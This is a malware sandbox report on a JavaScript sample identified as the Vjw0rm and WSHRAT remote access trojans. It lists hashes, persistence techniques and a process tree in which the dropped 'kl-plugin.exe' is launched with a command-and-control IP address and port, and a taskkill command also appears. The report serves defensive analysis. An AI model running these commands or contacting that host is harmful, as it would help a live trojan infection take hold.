Overview

overview

10

Static

static

extracted.js

windows7_x64

10

extracted.js

windows10_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    01-09-2021 04:44

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    extracted.js

  • Size

    18KB

  • MD5

    1d9327d69fd263ac645b6a4eef31cb24

  • SHA1

    3cff6c8d464e8c254048635dd68e31225ffcb6e4

  • SHA256

    b302998fc5e3ff4a61d22f5c35ea5e168e040d10bc8437cf8c190bfc27e63dd0

  • SHA512

    50cf6ff55a3f73803b4b1313c029e08e66e62ff6de1fd839fec21aecc09d30254616a3b8aab271828a7a69f4835d155ee4af53bb3c4daaa3b4a1cb2305409e2f

Score
10/10
vjw0rmwshratpersistencetrojanworm

Malware Config

Signatures

  • Vjw0rm

    Vjw0rm is a remote access trojan written in JavaScript.

    trojanwormvjw0rm
  • WSHRAT

    WSHRAT is a variant of Houdini worm and has vbs and js variants.

    trojanwshrat
  • Blocklisted process makes network request 22 IoCs
  • Executes dropped EXE 1 IoCs
  • Drops startup file 4 IoCs
  • Adds Run key to start application 2 TTPs 6 IoCs
    persistence
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies registry class 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\extracted.js
    1⤵
    • Blocklisted process makes network request
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4796
    • C:\Windows\System32\wscript.exe
      "C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\amqolYPJMq.js"
      2⤵
      • Blocklisted process makes network request
      • Drops startup file
      • Adds Run key to start application
      PID:3516
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\XLUWQJIUG1.vbs"
      2⤵
      • Blocklisted process makes network request
      • Drops startup file
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:1220
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c taskkill /F /IM kl-plugin.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1680
        • C:\Windows\system32\taskkill.exe
          taskkill /F /IM kl-plugin.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1988
      • C:\Users\Admin\AppData\Local\Temp\kl-plugin.exe
        "C:\Users\Admin\AppData\Local\Temp\kl-plugin.exe" 194.5.97.156 8256 "WSHRAT|3ED10BF6|GFBFPSXA|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 9/1/2021|Visual Basic-v2.0|NL:Netherlands" 1
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:2208

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1
T1060

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\XLUWQJIUG1.vbs
    MD5

    e335bd5a685e95d9652d5a600b3605ea

    SHA1

    863cb2c134c72d65138af0da4b4053d5e9d9cfc9

    SHA256

    d0cdcbfd0c9053bf94b6e8a2bdbe2df910833164330013c4ebc5623a2b5215ba

    SHA512

    dba67a7dbabc3a780f0e750ff80817d7ac9b83834c1755ff6b5ddb6541787c16adb2a33d20132184172b37963cd2cf3fced3cbdeaecf09dfbff76c3267f3650f

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\kl-plugin.exe
    MD5

    7099a939fa30d939ccceb2f0597b19ed

    SHA1

    37b644ef5722709cd9024a372db4590916381976

    SHA256

    272e64291748fa8be01109faa46c0ea919bf4baf4924177ea6ac2ee0574f1c1a

    SHA512

    6e179a32b3091beee71d425248ae56495e31e9df569159a93af5826ddef28fba904ae4810d3ca2da45fe6dc8be1eeaecf71e8225b3e605f22f41f4e46d1cf721

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\kl-plugin.exe
    MD5

    7099a939fa30d939ccceb2f0597b19ed

    SHA1

    37b644ef5722709cd9024a372db4590916381976

    SHA256

    272e64291748fa8be01109faa46c0ea919bf4baf4924177ea6ac2ee0574f1c1a

    SHA512

    6e179a32b3091beee71d425248ae56495e31e9df569159a93af5826ddef28fba904ae4810d3ca2da45fe6dc8be1eeaecf71e8225b3e605f22f41f4e46d1cf721

    Download Submit
  • C:\Users\Admin\AppData\Roaming\amqolYPJMq.js
    MD5

    3f7b92769fc59d8adc125b4d4e8adee4

    SHA1

    b3ea6913dcf3681572a1db1f429cc5e1e49b060e

    SHA256

    e1fccde6528046c2c1e41096085c199efaddc1393d42f6696165aeec43c9a209

    SHA512

    659caad97e885af9d5f2dece465873b517fc34a5c67f5f0aba08b9ef868cca57fe025ed9979bd0933e46ee45792d5b424bd99a24c4449c5b739f17e0b6bdf01f

    Download Submit
  • memory/1220-116-0x0000000000000000-mapping.dmp
    Download
  • memory/1680-118-0x0000000000000000-mapping.dmp
    Download
  • memory/1988-119-0x0000000000000000-mapping.dmp
    Download
  • memory/2208-120-0x0000000000000000-mapping.dmp
    Download
  • memory/2208-123-0x0000000002710000-0x0000000002711000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3516-114-0x0000000000000000-mapping.dmp
    Download